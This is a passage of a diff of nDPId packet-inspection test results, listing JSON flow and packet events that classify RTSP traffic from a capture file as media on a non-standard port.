+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} +00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAAL1W3kAAfwaNTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567279015,"flow_last_seen":1627567279015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567279015,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1627567279015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1627567279015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1627567279015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRW5UAAfwaN0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567338841,"flow_last_seen":1627567338841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567338841,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1627567338841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1627567338841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1627567338841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXFEAAfwaNoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567398644,"flow_last_seen":1627567398644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567398644,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1627567398644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1627567398644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1627567398644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXQ0AAfwaNcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567406342,"flow_last_seen":1627567406342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567406342,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1627567406342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1627567406342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1627567406342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXW0AAfwaNWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"thread_ts_msec":1627567407043,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567466882,"flow_last_seen":1627567466882,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567466882,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1627567466882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466882,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1627567466883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1627567466883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXikAAfwaNKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1627567467094,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567528106,"flow_last_seen":1627567528106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567528106,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1627567528106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAMAAQAGAAwp8x5yLpgIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1627567528106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1627567528106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXuEAAfwaM\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","packets-captured":568,"packets-processed":568,"total-skipped-flows":0,"total-l4-data-len":67396,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1627567528308} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 568/568 diff --git a/test/results/rtsp_setup_http.pcapng.out b/test/results/rtsp_setup_http.pcapng.out index 43ae951f3..62fc82d6d 100644 --- a/test/results/rtsp_setup_http.pcapng.out +++ b/test/results/rtsp_setup_http.pcapng.out 
@@ -1,9 +1,9 @@ 00468{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 